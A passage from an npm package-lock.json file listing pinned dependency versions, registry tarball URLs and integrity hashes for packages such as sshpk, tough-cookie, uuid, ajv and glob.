"sha512-NwrtjCg+lZoqhFU8fOwl4ay2ei8PaqCBOUV3/ektPY9trO1yQ1oXEfmHAhKArUVUr/hOHvy5f6AdP17dCM0zMw==", "engines": { "node": "*" } }, "node_modules/spdx-correct": { "version": "3.2.0", "resolved": "https://registry.npmjs.org/spdx-correct/-/spdx-correct-3.2.0.tgz", "integrity": "sha512-kN9dJbvnySHULIluDHy32WHRUu3Og7B9sbY7tsFLctQkIqnMh3hErYgdMjTYuqmcXX+lK5T1lnUt3G7zNswmZA==", "dependencies": { "spdx-expression-parse": "^3.0.0", "spdx-license-ids": "^3.0.0" } }, "node_modules/spdx-exceptions": { "version": "2.4.0", "resolved": "https://registry.npmjs.org/spdx-exceptions/-/spdx-exceptions-2.4.0.tgz", "integrity": "sha512-hcjppoJ68fhxA/cjbN4T8N6uCUejN8yFw69ttpqtBeCbF3u13n7mb31NB9jKwGTTWWnt9IbRA/mf1FprYS8wfw==" }, "node_modules/spdx-expression-parse": { "version": "3.0.1", "resolved": "https://registry.npmjs.org/spdx-expression-parse/-/spdx-expression-parse-3.0.1.tgz", "integrity": "sha512-cbqHunsQWnJNE6KhVSMsMeH5H/L9EpymbzqTQ3uLwNCLZ1Q481oWaofqH7nO6V07xlXwY6PhQdQ2IedWx/ZK4Q==", "dependencies": { "spdx-exceptions": "^2.1.0", "spdx-license-ids": "^3.0.0" } }, "node_modules/spdx-license-ids": { "version": "3.0.17", "resolved": "https://registry.npmjs.org/spdx-license-ids/-/spdx-license-ids-3.0.17.tgz", "integrity": "sha512-sh8PWc/ftMqAAdFiBu6Fy6JUOYjqDJBJvIhpfDMyHrr0Rbp5liZqd4TjtQ/RgfLjKFZb+LMx5hpml5qOWy0qvg==" }, "node_modules/sshpk": { "version": "1.18.0", "resolved": "https://registry.npmjs.org/sshpk/-/sshpk-1.18.0.tgz", "integrity": "sha512-2p2KJZTSqQ/I3+HX42EpYOa2l3f8Erv8MWKsy2I9uf4wA7yFIkXRffYdsx86y6z4vHtV8u7g+pPlr8/4ouAxsQ==", "dependencies": { "asn1": "~0.2.3", "assert-plus": "^1.0.0", "bcrypt-pbkdf": "^1.0.0", "dashdash": "^1.12.0", "ecc-jsbn": "~0.1.1", "getpass": "^0.1.1", "jsbn": "~0.1.0", "safer-buffer": "^2.0.2", "tweetnacl": "~0.14.0" }, "bin": { "sshpk-conv": "bin/sshpk-conv", "sshpk-sign": "bin/sshpk-sign", "sshpk-verify": "bin/sshpk-verify" }, "engines": { "node": ">=0.10.0" } }, "node_modules/string_decoder": { "version": "1.1.1", "resolved": "https://registry.npmjs.org/string_decoder/-/string_decoder-1.1.1.tgz", "integrity": "sha512-n/ShnvDi6FHbbVfviro+WojiFzv+s8MPMHBczVePfUpDJLwoLT0ht1l4YwBCbi8pJAveEEdnkHyPyTP/mzRfwg==", "dependencies": { "safe-buffer": "~5.1.0" } }, "node_modules/string-width": { "version": "4.2.3", "resolved": "https://registry.npmjs.org/string-width/-/string-width-4.2.3.tgz", "integrity": "sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==", "optional": true, "dependencies": { "emoji-regex": "^8.0.0", "is-fullwidth-code-point": "^3.0.0", "strip-ansi": "^6.0.1" }, "engines": { "node": ">=8" } }, "node_modules/strip-ansi": { "version": "6.0.1", "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", "optional": true, "dependencies": { "ansi-regex": "^5.0.1" }, "engines": { "node": ">=8" } }, "node_modules/supports-preserve-symlinks-flag": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/supports-preserve-symlinks-flag/-/supports-preserve-symlinks-flag-1.0.0.tgz", "integrity": "sha512-ot0WnXS9fgdkgIcePe6RHNk1WA8+muPa6cSjeR3V8K27q9BB1rTE3R1p7Hv0z1ZyAc8s6Vvv8DIyWf681MAt0w==", "engines": { "node": ">= 0.4" }, "funding": { "url": "https://github.com/sponsors/ljharb" } }, "node_modules/tough-cookie": { "version": "2.5.0", "resolved": "https://registry.npmjs.org/tough-cookie/-/tough-cookie-2.5.0.tgz", "integrity": "sha512-nlLsUzgm1kfLXSXfRZMc1KLAugd4hqJHDTvc2hDIwS3mZAfMEuMbc03SujMF+GEcpaX/qboeycw6iO8JwVv2+g==", "dependencies": { "psl": "^1.1.28", "punycode": "^2.1.1" }, "engines": { "node": ">=0.8" } }, "node_modules/tunnel-agent": { "version": "0.6.0", "resolved": "https://registry.npmjs.org/tunnel-agent/-/tunnel-agent-0.6.0.tgz", "integrity": "sha512-McnNiV1l8RYeY8tBgEpuodCC1mLUdbSN+CYBL7kJsJNInOP8UjDDEwdk6Mw60vdLLrr5NHKZhMAOSrR2NZuQ+w==", "dependencies": { "safe-buffer": "^5.0.1" }, "engines": { "node": "*" } }, "node_modules/tweetnacl": { "version": "0.14.5", "resolved": "https://registry.npmjs.org/tweetnacl/-/tweetnacl-0.14.5.tgz", "integrity": "sha512-KXXFFdAbFXY4geFIwoyNK+f5Z1b7swfXABfL7HXCmoIWMKU3dmS26672A4EeQtDzLKy7SXmfBu51JolvEKwtGA==" }, "node_modules/typedarray": { "version": "0.0.6", "resolved": "https://registry.npmjs.org/typedarray/-/typedarray-0.0.6.tgz", "integrity": "sha512-/aCDEGatGvZ2BIk+HmLf4ifCJFwvKFNb9/JeZPMulfgFracn9QFcAf5GO8B/mweUjSoblS5In0cWhqpfs/5PQA==" }, "node_modules/uri-js": { "version": "4.4.1", "resolved": "https://registry.npmjs.org/uri-js/-/uri-js-4.4.1.tgz", "integrity": "sha512-7rKUyy33Q1yc98pQ1DAmLtwX109F7TIfWlW1Ydo8Wl1ii1SeHieeh0HHfPeL2fMXK6z0s8ecKs9frCuLJvndBg==", "dependencies": { "punycode": "^2.1.0" } }, "node_modules/util-deprecate": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/util-deprecate/-/util-deprecate-1.0.2.tgz", "integrity": "sha512-EPD5q1uXyFxJpCrLnCc1nHnq3gOa6DZBocAIiI2TaSCA7VCJ1UJDMagCzIkXNsUYfD1daK//LTEQ8xiIbrHtcw==" }, "node_modules/uuid": { "version": "3.4.0", "resolved": "https://registry.npmjs.org/uuid/-/uuid-3.4.0.tgz", "integrity": "sha512-HjSDRw6gZE5JMggctHBcjVak08+KEVhSIiDzFnT9S9aegmp85S/bReBVTb4QTFaRNptJ9kuYaNhnbNEOkbKb/A==", "deprecated": "Please upgrade to version 7 or higher. Older versions may use Math.random() in certain circumstances, which is known to be problematic. See https://v8.dev/blog/math-random for details.", "bin": { "uuid": "bin/uuid" } }, "node_modules/validate-npm-package-license": { "version": "3.0.4", "resolved": "https://registry.npmjs.org/validate-npm-package-license/-/validate-npm-package-license-3.0.4.tgz", "integrity": "sha512-DpKm2Ui/xN7/HQKCtpZxoRWBhZ9Z0kqtygG8XCgNQ8ZlDnxuQmWhj566j8fN4Cu3/JmbhsDo7fcAJq4s9h27Ew==", "dependencies": { "spdx-correct": "^3.0.0", "spdx-expression-parse": "^3.0.0" } }, "node_modules/verror": { "version": "1.10.0", "resolved": "https://registry.npmjs.org/verror/-/verror-1.10.0.tgz", "integrity": "sha512-ZZKSmDAEFOijERBLkmYfJ+vmk3w+7hOLYDNkRCuRuMJGEmqYNCNLyBBFwWKVMhfwaEF3WOd0Zlw86U/WC/+nYw==", "engines": [ "node >=0.6.0" ], "dependencies": { "assert-plus": "^1.0.0", "core-util-is": "1.0.2", "extsprintf": "^1.2.0" } }, "node_modules/verror/node_modules/core-util-is": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/core-util-is/-/core-util-is-1.0.2.tgz", "integrity": "sha512-3lqz5YjWTYnW6dlDa5TLaTCcShfar1e40rmcJVwCBJC6mWlFuj0eCHIElmG1g5kyuJ/GD+8Wn4FFCcz4gJPfaQ==" }, "node_modules/wide-align": { "version": "1.1.5", "resolved": "https://registry.npmjs.org/wide-align/-/wide-align-1.1.5.tgz", "integrity": "sha512-eDMORYaPNZ4sQIuuYPDHdQvf4gyCF9rEEV/yPxGfwPkRodwEgiMUUXTx/dex+Me0wxx53S+NgUHaP7y3MGlDmg==", "optional": true, "dependencies": { "string-width": "^1.0.2 || 2 || 3 || 4" } }, "node_modules/wrappy": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/wrappy/-/wrappy-1.0.2.tgz", "integrity": "sha512-l4Sp/DRseor9wL6EvV2+TuQn63dMkPjZ/sp9XkghTEbV9KlPS1xUsZ3u7/IQO4wxtcFB4bgpQPRcR3QCvezPcQ==" } }, "dependencies": { "ajv": { "version": "6.12.6", "resolved": "https://registry.npmjs.org/ajv/-/ajv-6.12.6.tgz", "integrity": "sha512-j3fVLgvTo527anyYyJOGTYJbG+vnnQYvE0m5mmkc1TK+nxAppkCLMIL0aZ4dblVCNoGShhm+kzE4ZUykBoMg4g==", "requires": { "fast-deep-equal": "^3.1.1", "fast-json-stable-stringify": "^2.0.0", "json-schema-traverse": "^0.4.1", "uri-js": "^4.2.2" } }, "ansi-regex": { "version": "5.0.1", "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-5.0.1.tgz", "integrity": "sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ==", "optional": true }, "aproba": { "version": "2.0.0", "resolved": "https://registry.npmjs.org/aproba/-/aproba-2.0.0.tgz", "integrity": "sha512-lYe4Gx7QT+MKGbDsA+Z+he/Wtef0BiwDOlK/XkBrdfsh9J/jPPXbX0tE9x9cl27Tmu5gg3QUbUrQYa/y+KOHPQ==", "optional": true }, "are-we-there-yet": { "version": "4.0.2", "resolved": "https://registry.npmjs.org/are-we-there-yet/-/are-we-there-yet-4.0.2.tgz", "integrity": "sha512-ncSWAawFhKMJDTdoAeOV+jyW1VCMj5QIAwULIBV0SSR7B/RLPPEQiknKcg/RIIZlUQrxELpsxMiTUoAQ4sIUyg==", "optional": true }, "asn1": { "version": "0.2.6", "resolved": "https://registry.npmjs.org/asn1/-/asn1-0.2.6.tgz", "integrity": "sha512-ix/FxPn0MDjeyJ7i/yoHGFt/EX6LyNbxSEhPPXODPL+KB0VPk86UYfL0lMdy+KCnv+fmvIzySwaK5COwqVbWTQ==", "requires": { "safer-buffer": "~2.1.0" } }, "assert-plus": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/assert-plus/-/assert-plus-1.0.0.tgz", "integrity": "sha512-NfJ4UzBCcQGLDlQq7nHxH+tv3kyZ0hHQqF5BO6J7tNJeP5do1llPr8dZ8zHonfhAu0PHAdMkSo+8o0wxg9lZWw==" }, "asynckit": { "version": "0.4.0", "resolved": "https://registry.npmjs.org/asynckit/-/asynckit-0.4.0.tgz", "integrity": "sha512-Oei9OH4tRh0YqU3GxhX79dM/mwVgvbZJaSNaRk+bshkj0S5cfHcgYakreBjrHwatXKbz+IoIdYLxrKim2MjW0Q==" }, "aws-sign2": { "version": "0.7.0", "resolved": "https://registry.npmjs.org/aws-sign2/-/aws-sign2-0.7.0.tgz", "integrity": "sha512-08kcGqnYf/YmjoRhfxyu+CLxBjUtHLXLXX/vUfx9l2LYzG3c1m61nrpyFUZI6zeS+Li/wWMMidD9KgrqtGq3mA==" }, "aws4": { "version": "1.12.0", "resolved": "https://registry.npmjs.org/aws4/-/aws4-1.12.0.tgz", "integrity": "sha512-NmWvPnx0F1SfrQbYwOi7OeaNGokp9XhzNioJ/CSBs8Qa4vxug81mhJEAVZwxXuBmYB5KDRfMq/F3RR0BIU7sWg==" }, "balanced-match": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/balanced-match/-/balanced-match-1.0.2.tgz", "integrity": "sha512-3oSeUO0TMV67hN1AmbXsK4yaqU7tjiHlbxRDZOpH0KW9+CeX4bRAaX0Anxt0tx2MrpRpWwQaPwIlISEJhYU5Pw==" }, "bcrypt-pbkdf": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/bcrypt-pbkdf/-/bcrypt-pbkdf-1.0.2.tgz", "integrity": "sha512-qeFIXtP4MSoi6NLqO12WfqARWWuCKi2Rn/9hJLEmtB5yTNr9DqFWkJRCf2qShWzPeAMRnOgCrq0sg/KLv5ES9w==", "requires": { "tweetnacl": "^0.14.3" } }, "brace-expansion": { "version": "1.1.11", "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-1.1.11.tgz", "integrity": "sha512-iCuPHDFgrHX7H2vEI/5xpz07zSHB00TpugqhmYtVmMO6518mCuRMoOYFldEBl0g187ufozdaHgWKcYFb61qGiA==", "requires": { "balanced-match": "^1.0.0", "concat-map": "0.0.1" } }, "caseless": { "version": "0.12.0", "resolved": "https://registry.npmjs.org/caseless/-/caseless-0.12.0.tgz", "integrity": "sha512-4tYFyifaFfGacoiObjJegolkwSU4xQNGbVgUiNYVUxbQ2x2lUsFvY4hVgVzGiIe6WLOPqycWXA40l+PWsxthUw==" }, "chownr": { "version": "0.0.2", "resolved": "https://registry.npmjs.org/chownr/-/chownr-0.0.2.tgz", "integrity": "sha512-4sa7ZJ+/DavveVRsu49tUbYvLn5cS75w8gLQr14jXlFxSNbuoY7G6gPjcVfgdQ+c4BW02b0hXV5nOXYFD7Fmpw==" }, "color-support": { "version": "1.1.3", "resolved": "https://registry.npmjs.org/color-support/-/color-support-1.1.3.tgz", "integrity": "sha512-qiBjkpbMLO/HL68y+lh4q0/O1MZFj2RX6X/KmMa3+gJD3z+WwI1ZzDHysvqHGS3mP6mznPckpXmw1nI9cJjyRg==", "optional": true }, "combined-stream": { "version": "1.0.8", "resolved": "https://registry.npmjs.org/combined-stream/-/combined-stream-1.0.8.tgz", "integrity": "sha512-FQN4MRfuJeHf7cBbBMJFXhKSDq+2kAArBlmRBvcvFE5BB1HZKXtSFASDhdlz9zOYwxh8lDdnvmMOe/+5cdoEdg==", "requires": { "delayed-stream": "~1.0.0" } }, "concat-map": { "version": "0.0.1", "resolved": "https://registry.npmjs.org/concat-map/-/concat-map-0.0.1.tgz", "integrity": "sha512-/Srv4dswyQNBfohGpz9o6Yb3Gz3SrUDqBH5rTuhGR7ahtlbYKnVxw2bCFMRljaA7EXHaXZ8wsHdodFvbkhKmqg==" }, "concat-stream": { "version": "1.5.0", "resolved": "https://registry.npmjs.org/concat-stream/-/concat-stream-1.5.0.tgz", "integrity": "sha512-litEocitzYgqQ0IPaoLw+tCHcVcJJYW05+SAhH+LS9qutSC7iuejvawts3cUYQycZbRbLsjG8mCJLQi2KX5kEw==", "requires": { "inherits": "~2.0.1", "readable-stream": "~2.0.0", "typedarray": "~0.0.5" } }, "console-control-strings": { "version": "1.1.0", "resolved": "https://registry.npmjs.org/console-control-strings/-/console-control-strings-1.1.0.tgz", "integrity": "sha512-ty/fTekppD2fIwRvnZAVdeOiGd1c7YXEixbgJTNzqcxJWKQnjJ/V1bNEEE6hygpM3WjwHFUVK6HTjWSzV4a8sQ==", "optional": true }, "core-util-is": { "version": "1.0.3", "resolved": "https://registry.npmjs.org/core-util-is/-/core-util-is-1.0.3.tgz", "integrity": "sha512-ZQBvi1DcpJ4GDqanjucZ2Hj3wEO5pZDS89BWbkcrvdxksJorwUDDZamX9ldFkp9aw2lmBDLgkObEA4DWNJ9FYQ==" }, "dashdash": { "version": "1.14.1", "resolved": "https://registry.npmjs.org/dashdash/-/dashdash-1.14.1.tgz", "integrity": "sha512-jRFi8UDGo6j+odZiEpjazZaWqEal3w/basFjQHQEwVtZJGDpxbH1MeYluwCS8Xq5wmLJooDlMgvVarmWfGM44g==", "requires": { "assert-plus": "^1.0.0" } }, "delayed-stream": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/delayed-stream/-/delayed-stream-1.0.0.tgz", "integrity": "sha512-ZySD7Nf91aLB0RxL4KGrKHBXl7Eds1DAmEdcoVawXnLD7SDhpNgtuII2aAkg7a7QS41jxPSZ17p4VdGnMHk3MQ==" }, "ecc-jsbn": { "version": "0.1.2", "resolved": "https://registry.npmjs.org/ecc-jsbn/-/ecc-jsbn-0.1.2.tgz", "integrity": "sha512-eh9O+hwRHNbG4BLTjEl3nw044CkGm5X6LoaCf7LPp7UU8Qrt47JYNi6nPX8xjW97TKGKm1ouctg0QSpZe9qrnw==", "requires": { "jsbn": "~0.1.0", "safer-buffer": "^2.1.0" } }, "emoji-regex": { "version": "8.0.0", "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-8.0.0.tgz", "integrity": "sha512-MSjYzcWNOA0ewAHpz0MxpYFvwg6yjy1NG3xteoqz644VCo/RPgnr1/GGt+ic3iJTzQ8Eu3TdM14SawnVUmGE6A==", "optional": true }, "extend": { "version": "3.0.2", "resolved": "https://registry.npmjs.org/extend/-/extend-3.0.2.tgz", "integrity": "sha512-fjquC59cD7CyW6urNXK0FBufkZcoiGG80wTuPujX590cB5Ttln20E2UB4S/WARVqhXffZl2LNgS+gQdPIIim/g==" }, "extsprintf": { "version": "1.3.0", "resolved": "https://registry.npmjs.org/extsprintf/-/extsprintf-1.3.0.tgz", "integrity": "sha512-11Ndz7Nv+mvAC1j0ktTa7fAb0vLyGGX+rMHNBYQviQDGU0Hw7lhctJANqbPhu9nV9/izT/IntTgZ7Im/9LJs9g==" }, "fast-deep-equal": { "version": "3.1.3", "resolved": "https://registry.npmjs.org/fast-deep-equal/-/fast-deep-equal-3.1.3.tgz", "integrity": "sha512-f3qQ9oQy9j2AhBe/H9VC91wLmKBCCU/gDOnKNAYG5hswO7BLKj09Hc5HYNz9cGI++xlpDCIgDaitVs03ATR84Q==" }, "fast-json-stable-stringify": { "version": "2.1.0", "resolved": "https://registry.npmjs.org/fast-json-stable-stringify/-/fast-json-stable-stringify-2.1.0.tgz", "integrity": "sha512-lhd/wF+Lk98HZoTCtlVraHtfh5XYijIjalXck7saUtuanSDyLMxnHhSXEDJqHxD7msR8D0uCmqlkwjCV8xvwHw==" }, "forever-agent": { "version": "0.6.1", "resolved": "https://registry.npmjs.org/forever-agent/-/forever-agent-0.6.1.tgz", "integrity": "sha512-j0KLYPhm6zeac4lz3oJ3o65qvgQCcPubiyotZrXqEaG4hNagNYO8qdlUrX5vwqv9ohqeT/Z3j6+yW067yWWdUw==" }, "form-data": { "version": "2.3.3", "resolved": "https://registry.npmjs.org/form-data/-/form-data-2.3.3.tgz", "integrity": "sha512-1lLKB2Mu3aGP1Q/2eCOx0fNbRMe7XdwktwOruhfqqd0rIJWwN4Dh+E3hrPSlDCXnSR7UtZ1N38rVXm+6+MEhJQ==", "requires": { "asynckit": "^0.4.0", "combined-stream": "^1.0.6", "mime-types": "^2.1.12" } }, "fs.realpath": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/fs.realpath/-/fs.realpath-1.0.0.tgz", "integrity": "sha512-OO0pH2lK6a0hZnAdau5ItzHPI6pUlvI7jMVnxUQRtw4owF2wk8lOSabtGDCTP4Ggrg2MbGnWO9X8K1t4+fGMDw==" }, "function-bind": { "version": "1.1.2", "resolved": "https://registry.npmjs.org/function-bind/-/function-bind-1.1.2.tgz", "integrity": "sha512-7XHNxH7qX9xG5mIwxkhumTox/MIRNcOgDrxWsMt2pAr23WHp6MrRlN7FBSFpCpr+oVO0F744iUgR82nJMfG2SA==" }, "gauge": { "version": "5.0.1", "resolved": "https://registry.npmjs.org/gauge/-/gauge-5.0.1.tgz", "integrity": "sha512-CmykPMJGuNan/3S4kZOpvvPYSNqSHANiWnh9XcMU2pSjtBfF0XzZ2p1bFAxTbnFxyBuPxQYHhzwaoOmUdqzvxQ==", "optional": true, "requires": { "aproba": "^1.0.3 || ^2.0.0", "color-support": "^1.1.3", "console-control-strings": "^1.1.0", "has-unicode": "^2.0.1", "signal-exit": "^4.0.1", "string-width": "^4.2.3", "strip-ansi": "^6.0.1", "wide-align": "^1.1.5" } }, "getpass": { "version": "0.1.7", "resolved": "https://registry.npmjs.org/getpass/-/getpass-0.1.7.tgz", "integrity": "sha512-0fzj9JxOLfJ+XGLhR8ze3unN0KZCgZwiSSDz168VERjK8Wl8kVSdcu2kspd4s4wtAa1y/qrVRiAA0WclVsu0ng==", "requires": { "assert-plus": "^1.0.0" } }, "glob": { "version": "7.2.3", "resolved": "https://registry.npmjs.org/glob/-/glob-7.2.3.tgz", "integrity": "sha512-nFR0zLpU2YCaRxwoCJvL6UvCH2JFyFVIvwTLsIf21AuHlMskA1hhTdk+LlYJtOlYt9v6dvszD2BGRqBL+iQK9Q==", "requires": { "fs.realpath": "^1.0.0", "inflight": "^1.0.4", "inherits": "2", "minimatch": "^3.1.1", "once": "^1.3.0", "path-is-absolute": "^1.0.0" } }, "graceful-fs": { "version": "3.0.12", "resolved": "https://registry.npmjs.org/graceful-fs/-/graceful-fs-3.0.12.tgz", "integrity": "sha512-J55gaCS4iTTJfTXIxSVw3EMQckcqkpdRv3IR7gu6sq0+tbC363Zx6KH/SEwXASK9JRbhyZmVjJEVJIOxYsB3Qg==", "requires": { "natives": "^1.1.3" } }, "har-schema": { "version": "2.0.0", "resolved": "https://registry.npmjs.org/har-schema/-/har-schema-2.0.0.tgz", "integrity": "sha512-Oqluz6zhGX8cyRaTQlFMPw80bSJVG2x/cFb8ZPhUILGgHka9SsokCCOQgpveePerqidZOrT14ipqfJb7ILcW5Q==" }, "har-validator": { "version": "5.1.5", "resolved": "https://registry.npmjs.org/har-validator/-/har-validator-5.1.5.tgz", "integrity": "sha512-nmT2T0lljbxdQZfspsno9hgrG3Uir6Ks5afism62poxqBM6sDnMEuPmzTq8XN0OEwqKLLdh1jQI3qyE66Nzb3w==", "requires": { "ajv": "^6.12.3", "har-schema": "^2.0.0" } }, "has-unicode": { "version": "2.0.1", "resolved": "https://registry.npmjs.org/has-unicode/-/has-unicode-2.0.1.tgz", "integrity": "sha512-8Rf9Y83NBReMnx0gFzA8JImQACstCYWUplepDa9xprwwtmgEZUF0h/i5xSA625zB/I37EtrswSST6OXxwaaIJQ==", "optional": true }, "hasown": { "version": "2.0.1", "resolved": "https://registry.npmjs.org/hasown/-/hasown-2.0.1.tgz", "integrity": "sha512-1/th4MHjnwncwXsIW6QMzlvYL9kG5e/CpVvLRZe4XPa8TOUNbCELqmvhDmnkNsAjwaG4+I8gJJL0JBvTTLO9qA==", "requires": { "function-bind": "^1.1.2" } }, "hosted-git-info": { "version": "2.1.4", "resolved": "https://registry.npmjs.org/hosted-git-info/-/hosted-git-info-2.1.4.tgz", "integrity": "sha512-4R9eDu2ytsDMdo7nQXHrpK1347y3nu/ThXZ4tjpkUTsZnzoIIQprnPOM65c20oInjmocLuEGBIbPsesYCqibag==" }, "http-signature": { "version": "1.2.0", "resolved": "https://registry.npmjs.org/http-signature/-/http-signature-1.2.0.tgz", "integrity": "sha512-CAbnr6Rz4CYQkLYUtSNXxQPUH2gK8f3iWexVlsnMeD+GjlsQ0Xsy1cOX+mN3dtxYomRy21CiOzU8Uhw6OwncEQ==", "requires": { "assert-plus": "^1.0.0", "jsprim": "^1.2.2", "sshpk": "^1.7.0" } }, "inflight": { "version": "1.0.6", "resolved": "https://registry.npmjs.org/inflight/-/inflight-1.0.6.tgz", "integrity": "sha512-k92I/b08q4wvFscXCLvqfsHCrjrF7yiXsQuIVvVE7N82W3+aqpzuUdBbfhWcy/FZR3/4IgflMgKLOsvPDrGCJA==", "requires": { "once": "^1.3.0", "wrappy": "1" } }, "inherits": { "version": "2.0.4", "resolved": "https://registry.npmjs.org/inherits/-/inherits-2.0.4.tgz", "integrity": "sha512-k/vGaX4/Yla3WzyMCvTQOXYeIHvqOKtnqBduzTHpzpQZzAskKMhZ2K+EnBiSM9zGSoIFeMpXKxa4dYeZIQqewQ==" }, "is-core-module": { "version": "2.13.1", "resolved": "https://registry.npmjs.org/is-core-module/-/is-core-module-2.13.1.tgz", "integrity": "sha512-hHrIjvZsftOsvKSn2TRYl63zvxsgE0K+0mYMoH6gD4omR5IWB2KynivBQczo3+wF1cCkjzvptnI9Q0sPU66ilw==", "requires": { "hasown": "^2.0.0" } }, "is-fullwidth-code-point": { "version": "3.0.0", "resolved": "https://registry.npmjs.org/is-fullwidth-code-point/-/is-fullwidth-code-point-3.0.0.tgz", "integrity": "sha512-zymm5+u+sCsSWyD9qNaejV3DFvhCKclKdizYaJUuHA83RLjb7nSuGnddCHGv0hk+KY7BMAlsWeK4Ueg6EV6XQg==", "optional": true }, "is-typedarray": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/is-typedarray/-/is-typedarray-1.0.0.tgz", "integrity": "sha512-cyA56iCMHAh5CdzjJIa4aohJyeO1YbwLi3Jc35MmRU6poroFjIGZzUzupGiRPOjgHg9TLu43xbpwXk523fMxKA==" }, "isarray": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/isarray/-/isarray-1.0.0.tgz", "integrity": "sha512-VLghIWNM6ELQzo7zwmcg0NmTVyWKYjvIeM83yjp0wRDTmUnrM678fQbcKBo6n2CJEF0szoG//ytg+TKla89ALQ==" }, "isstream": { "version": "0.1.2", "resolved": "https://registry.npmjs.org/isstream/-/isstream-0.1.2.tgz", "integrity": "sha512-Yljz7ffyPbrLpLngrMtZ7NduUgVvi6wG9RJ9IUcyCd59YQ911PBJphODUcbOVbqYfxe1wuYf/LJ8PauMRwsM/g==" }, "jsbn": { "version": "0.1.1", "resolved": "https://registry.npmjs.org/jsbn/-/jsbn-0.1.1.tgz", "integrity": "sha512-UVU9dibq2JcFWxQPA6KCqj5O42VOmAY3zQUfEKxU0KpTGXwNoCjkX1e13eHNvw/xPynt6pU0rZ1htjWTNTSXsg==" }, "json-schema": { "version": "0.4.0", "resolved": "https://registry.npmjs.org/json-schema/-/json-schema-0.4.0.tgz", "integrity": "sha512-es94M3nTIfsEPisRafak+HDLfHXnKBhV3vU5eqPcS3flIWqcxJWgXHXiey3YrpaNsanY5ei1VoYEbOzijuq9BA==" }, "json-schema-traverse": { "version": "0.4.1", "resolved": "https://registry.npmjs.org/json-schema-traverse/-/json-schema-traverse-0.4.1.tgz", "integrity": "sha512-xbbCH5dCYU5T8LcEhhuh7HJ88HXuW3qsI3Y0zOZFKfZEHcpWiHU/Jxzk629Brsab/mMiHQti9wMP+845RPe3Vg==" }, "json-stringify-safe": { "version": "5.0.1", "resolved": "https://registry.npmjs.org/json-stringify-safe/-/json-stringify-safe-5.0.1.tgz", "integrity": "sha512-ZClg6AaYvamvYEE82d3Iyd3vSSIjQ+odgjaTzRuO3s7toCdFKczob2i0zCh7JE8kWn17yvAWhUVxvqGwUalsRA==" }, "jsprim": { "version": "1.4.2", "resolved": "https://registry.npmjs.org/jsprim/-/jsprim-1.4.2.tgz", "integrity": "sha512-P2bSOMAc/ciLz6DzgjVlGJP9+BrJWu5UDGK70C2iweC5QBIeFf0ZXRvGjEj2uYgrY2MkAAhsSWHDWlFtEroZWw==", "requires": { "assert-plus": "1.0.0", "extsprintf": "1.3.0", "json-schema": "0.4.0", "verror": "1.10.0" } }, "mime-db": { "version": "1.52.0", "resolved": "https://registry.npmjs.org/mime-db/-/mime-db-1.52.0.tgz", "integrity": "sha512-sPU4uV7dYlvtWJxwwxHD0PuihVNiE7TyAbQ5SWxDCB9mUYvOgroQOwYQQOKPJ8CIbE+1ETVlOoK1UC2nU3gYvg==" }, "mime-types": { "version": "2.1.35", "resolved": "https://registry.npmjs.org/mime-types/-/mime-types-2.1.35.tgz", "integrity": "sha512-ZDY+bPm5zTTF+YpCrAU9nK0UgICYPT0QtT1NZWFv4s++TNkcgVaT0g6+4R2uI4MjQjzysHB1zxuWL50hzaeXiw==", "requires": { "mime-db": "1.52.0" } }, "minimatch": { "version": "3.1.2", "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-3.1.2.tgz", "integrity": "sha512-J7p63hRiAjw1NDEww1W7i37+ByIrOWO5XQQAzZ3VOcL0PNybwpfmV/N05zFAzwQ9USyEcX6t3UO+K5aqBQOIHw==", "requires": { "brace-expansion": "^1.1.7" } }, "minimist": { "version": "1.2.8", "resolved": "https://registry.npmjs.org/minimist/-/minimist-1.2.8.tgz", "integrity": "sha512-2yyAR8qBkN3YuheJanUpWC5U3bb5osDywNB8RzDVlDwDHbocAJveqqj1u8+SVD7jkWT4yvsHCpWqqWqAxb0zCA==" }, "mkdirp": { "version": "0.5.6", "resolved": "https://registry.npmjs.org/mkdirp/-/mkdirp-0.5.6.tgz", "integrity": "sha512-FP+p8RB8OWpF3YZBCrP5gtADmtXApB5AMLn+vdyA+PyxCjrCs00mjyUozssO33cwDeT3wNGdLxJ5M//YqtHAJw==", "requires": { "minimist": "^1.2.6" } }, "natives": { "version": "1.1.6", "resolved": "https://registry.npmjs.org/natives/-/natives-1.1.6.tgz", "integrity": "sha512-6+TDFewD4yxY14ptjKaS63GVdtKiES1pTPyxn9Jb0rBqPMZ7VcCiooEhPNsr+mqHtMGxa/5c/HhcC4uPEUw/nA==" }, "normalize-package-data": { "version": "2.5.0", "resolved": "https://registry.npmjs.org/normalize-package-data/-/normalize-package-data-2.5.0.tgz", "integrity": "sha512-/5CMN3T0R4XTj4DcGaexo+roZSdSFW/0AOOTROrjxzCG1wrWXEsGbRKevjlIL+ZDE4sZlJr5ED4YW0yqmkK+eA==", "requires": { "hosted-git-info": "^2.1.4", "resolve": "^1.10.0", "semver": "2 || 3 || 4 || 5", "validate-npm-package-license": "^3.0.1" } }, "npm-package-arg": { "version": "3.1.1", "resolved": "https://registry.npmjs.org/npm-package-arg/-/npm-package-arg-3.1.1.tgz", "integrity": 